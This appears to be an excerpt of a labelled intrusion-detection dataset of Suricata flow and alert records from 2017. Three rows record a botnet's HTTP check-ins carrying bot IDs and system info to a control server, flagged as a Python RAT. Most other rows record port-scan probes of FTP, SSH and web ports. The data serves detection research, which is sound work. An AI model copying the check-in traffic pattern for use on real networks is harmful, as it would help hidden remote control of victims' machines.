192.168.10.15-52314-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4539527, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:22 | 64,392 | Friday | [{'timestamp': '2017-07-07T13:28:22.946170+0000', 'flow_id': 646686992398225, 'pcap_cnt': 4539527, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52314, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:22.882577+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob1ZAAIAGTcrAqAoPza6lScxaH5CR05zbaPzy4FARAQD6rAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:22.946170+0000', 'flow_id': 646686992398225, 'pcap_cnt': 4539527, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52314, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:22.882577+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob1ZAAIAGTcrAqAoPza6lScxaH5CR05zbaPzy4FARAQD6rAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,279 |
192.168.10.9-2756-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4540721, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:28 | 79,815 | Friday | [{'timestamp': '2017-07-07T13:28:28.829368+0000', 'flow_id': 7179247317641, 'pcap_cnt': 4540721, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2756, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:28.750217+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPlpAAIAGfszAqAoJza6lSQrEH5AJk8CdCZ5bSFARAQAXvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:28.829368+0000', 'flow_id': 7179247317641, 'pcap_cnt': 4540721, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2756, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:28.750217+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPlpAAIAGfszAqAoJza6lSQrEH5AJk8CdCZ5bSFARAQAXvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,324 |
192.168.10.14-51613-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4540853, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:31 | 73,883 | Friday | [{'timestamp': '2017-07-07T13:28:31.445906+0000', 'flow_id': 1479708784963487, 'pcap_cnt': 4540853, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51613, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:31.372639+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGYZAAIAGo5vAqAoOza6lScmdH5D6idwNemM7r1ARAQD7TAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:31.445906+0000', 'flow_id': 1479708784963487, 'pcap_cnt': 4540853, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51613, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:31.372639+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGYZAAIAGo5vAqAoOza6lScmdH5D6idwNemM7r1ARAQD7TAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,329 |
172.16.0.1-54987-192.168.10.50-80-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 2, flow_pkts_toclient: 1, flow_bytes_toserver: 120, flow_bytes_toclient: 60, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 16, tcp_tcp_flags_ts: 06, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 16:55:32 | 671 | Friday | [] | 127 | attack | 1,325,873 |
172.16.0.1-37884-192.168.10.50-21-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 3, flow_pkts_toclient: 1, flow_bytes_toserver: 206, flow_bytes_toclient: 74, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 16, tcp_tcp_flags_ts: 16, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 16:58:52 | 898 | Friday | [] | 127 | attack | 1,327,602 |
172.16.0.1-38602-192.168.10.50-443-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 1, flow_pkts_toclient: 1, flow_bytes_toserver: 74, flow_bytes_toclient: 60, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 16, tcp_tcp_flags_ts: 02, tcp_tcp_flags_tc: 14, tcp_syn: True, tcp_rst: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 16:58:53 | 97 | Friday | [] | 127 | attack | 1,327,606 |
172.16.0.1-60744-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6557385, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:14:05 | 4,578 | Friday | [] | 220 | attack | 1,335,247 |
172.16.0.1-45018-192.168.10.50-22-6 | ['flow', 'ssh'] | event_type: flow, proto: TCP, app_proto: ssh, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 247, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: ssh, proto: TCP, tx_id: 0, ssh_server_proto_version: 2.0, ssh_server_software_version: OpenSSH_7.2p2 | false | Portscan | true | 17:14:05 | 12,411 | Friday | [] | 189 | attack | 1,335,248 |
172.16.0.1-35550-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 6, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 1450 | false | Portscan | true | 17:14:05 | 38,081 | Friday | [] | 193 | attack | 1,335,249 |
172.16.0.1-35552-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 1450 | false | Portscan | true | 17:14:11 | 338,225 | Friday | [] | 193 | attack | 1,335,273 |
172.16.0.1-35554-192.168.10.50-80-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 466, flow_bytes_toclient: 11914, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_hostname: ip-68-165-174-205.ironcladservers.ca, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 1193 ; event_type: fileinfo, proto: TCP, http_hostname: ip-68-165-174-205.ironcladservers.ca, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 1193, app_proto: http, fileinfo_filename: /, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 1193, fileinfo_tx_id: 0 | false | Portscan | true | 17:14:11 | 2,110 | Friday | [] | 371 | attack | 1,335,274 |
172.16.0.1-35560-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 6, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 21420 | false | Portscan | true | 17:14:17 | 26,895 | Friday | [] | 193 | attack | 1,335,284 |
172.16.0.1-60754-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6558139, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:14:17 | 4,994 | Friday | [] | 220 | attack | 1,335,282 |
172.16.0.1-35562-192.168.10.50-80-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 8414 ; event_type: fileinfo, proto: TCP, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 8414, app_proto: http, fileinfo_filename: /, fileinfo_gaps: True, fileinfo_state: TRUNCATED, fileinfo_stored: False, fileinfo_size: 8414, fileinfo_tx_id: 0 | false | Portscan | true | 17:14:23 | 389,966 | Friday | [] | 329 | attack | 1,335,290 |
172.16.0.1-60764-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6558795, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:14:28 | 5,076 | Friday | [] | 220 | attack | 1,335,305 |
172.16.0.1-35572-192.168.10.50-80-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 1174 ; event_type: fileinfo, proto: TCP, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 1174, app_proto: http, fileinfo_filename: /, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 1174, fileinfo_tx_id: 0 | false | Portscan | true | 17:14:34 | 100,135 | Friday | [] | 327 | attack | 1,335,313 |
172.16.0.1-60774-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6559749, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:14:40 | 4,925 | Friday | [] | 220 | attack | 1,335,349 |
172.16.0.1-45058-192.168.10.50-22-6 | ['flow', 'ssh'] | event_type: flow, proto: TCP, app_proto: ssh, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 338, flow_bytes_toclient: 313, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: ssh, proto: TCP, tx_id: 0, ssh_server_proto_version: 2.0, ssh_server_software_version: OpenSSH_7.2p2 | false | Portscan | true | 17:14:51 | 13,760 | Friday | [] | 189 | attack | 1,335,773 |
172.16.0.1-60784-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6568762, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:14:51 | 4,786 | Friday | [] | 220 | attack | 1,335,774 |
